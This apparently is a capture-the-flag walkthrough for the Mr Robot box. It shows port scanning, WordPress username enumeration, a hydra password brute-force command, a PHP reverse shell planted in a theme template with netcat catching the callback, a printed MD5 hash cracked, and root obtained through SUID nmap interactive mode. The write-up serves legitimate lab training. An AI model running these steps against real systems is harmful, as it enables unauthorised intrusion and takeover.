💀Mr Robot CTF
Based on the Mr. Robot show, can you root this box?
Subscription Required
False [Free]
Type
Challenges (CTF)
Difficulty
Medium
Tags
MrRobot, Root, Beginner
Video Walkthrough
Task 1 - Connect to our network
Go to your access page and download your configuration file.
No answer needed
Use an OpenVPN client to connect. In my example I am on Linux, on the access page we have a windows tutorial.
No answer needed
You are now ready to use our machines on our network!
No answer needed
Now when you deploy material, you will see an internal IP address of your Virtual Machine.
No answer needed
Task 2 - Hack the machine
What is key 1?
Running nmap or rustscan against the target returns two open ports on port 80 and 443.
rustscan -b 1500 -a TARGET_IP --range 1-1000PORT STATE SERVICE REASON
80/tcp open http syn-ack
443/tcp open https syn-ackHINT: Robots
Checking the robots.txt file shows two interesting files:
fsocity.dic
key-1-of-3.txt
key-1-of-3.txt contains the first flag:
What is key 2?
Next run dirb, dirbuster, or gobuster against the target to find some interesting URLs:
gobuster dir -u http://TARGET_IP/ -w /usr/share/wordlists/dirb/common.txt/.hta (Status: 403) [Size: 213]
/.htaccess (Status: 403) [Size: 218]
/.htpasswd (Status: 403) [Size: 218]
/0 (Status: 301) [Size: 0] [--> http://10.10.121.252/0/]
/admin (Status: 301) [Size: 235] [--> http://10.10.121.252/admin/]
/atom (Status: 301) [Size: 0] [--> http://10.10.121.252/feed/atom/]
/audio (Status: 301) [Size: 235] [--> http://10.10.121.252/audio/]
/blog (Status: 301) [Size: 234] [--> http://10.10.121.252/blog/]/0 opened a wordpress blog. Going to the login screen http://TARGET_IP/wp-login.php shows the wordpress login screen. Entering the username 'admin' and the password 'admin' presents an error message:
ERROR: Invalid username.
This page can be used to enumerate valid usernames as when providing the username 'elliot' (the main character's name in Mr. Robot) the error states the password is wrong:
ERROR: The password you entered for the username elliot is incorrect.
Looking at fsocity.dic there are a number of duplicate entries so we can strip those out to optimise the wordlist:
sort fsocity.dic | uniq > fsocity-sorted.dicWe can then use wpscan, hydra, or burp suite intruder (slow) to brute force the password.
hydra -l 'elliot' -P Documents/THM/mrrobot/fsocity-sorted.dic TARGET_IP -V http-form-post '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:S=Location' -t 16You should find the password around the 5000th attempt.
HINT: White coloured font
Once logged into wordpress as an admin we can check out the image gallery. One image has white text in the background which reveals another username and also their password:
In order to turn our wordpress access into a shell we can edit the templates to add the PHP PenTestMonkey reverse shell pointing to your tun0 IP address into the 404.php template file:
Start a netcat listener on your machine then open the 404.php page in a browser to trigger the reverse shell.
listening on [any] 4444 ...
connect to [10.9.12.198] from (UNKNOWN) [10.10.121.252] 37394
Linux linux 3.13.0-55-generic #94-Ubuntu SMP Thu Jun 18 00:27:10 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux 19:03:27 up 46 min, 0 users, load average: 0.05, 0.06, 0.13
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=1(daemon) gid=1(daemon) groups=1(daemon)
bash: cannot set terminal process group (1998): Inappropriate ioctl for device
bash: no job control in this shell
daemon@linux:/$With a shell we can extract the md5 hash from password.raw-md5 from the daemon /home/robot/ directory:
daemon@linux:/$ cd /home/robot
daemon@linux:/home/robot$ ls
key-2-of-3.txt
password.raw-md5
daemon@linux:/home/robot$ cat password.raw-md5
robot:c3fcd3d76192e4007dfb496cca67e13bWe can reverse the hash using crackstation:
c3fcd3d76192e4007dfb496cca67e13b
md5
(expand below)
Trying to cat key-2-of-3.txt we find that we don't have adequate permissions:
daemon@linux:/home/robot$ cat key-2-of-3.txt
cat: key-2-of-3.txt: Permission deniedTrying to run su results in an error message saying we need to run it in a terminal
daemon@linux:/home/robot$ su robot
su: must be run from a terminalTo get past this we need to upgrade our shell to a TTY shell:
daemon@linux:/home/robot$ python -c 'import pty; pty.spawn("/bin/sh")'$ su robot
Password: (expand above)robot@linux:~$ cat key-2-of-3.txt
(reveal flag #2 below)What is key 3?
HINT: nmap
The final flag is in the root directory so in order to reach that we need to privilege escalate our current shell. Searching the filesystem for files with the SUID bit set we find that nmap is installed and SUID is set:
robot@linux:~$ find / -perm /4000
/bin/ping
/bin/umount
/bin/mount
/bin/ping6
/bin/su
find: /etc/ssl/private': Permission denied
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/sudo
/usr/local/bin/nmap
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/vmware-tools/bin32/vmware-user-suid-wrapper
/usr/lib/vmware-tools/bin64/vmware-user-suid-wrapper
/usr/lib/pt_chownGTFOBins shows the steps to run nmap in interactive mode which you can abuse to run commands as root:
nmap --interactive
nmap> !shrobot@linux:~$ nmap --interactive
nmap --interactive
Starting nmap V. 3.81 ( http://www.insecure.org/nmap/ )
Welcome to Interactive Mode -- press h <enter> for help
nmap> !sh
!sh
# With root shell we can access the root directory and obtain our final flag!
# cd /root
cd /root
# ls
ls
firstboot_done key-3-of-3.txt
# cat key-3-of-3.txt
cat key-3-of-3.txt
(reveal flag #3 below)Last updated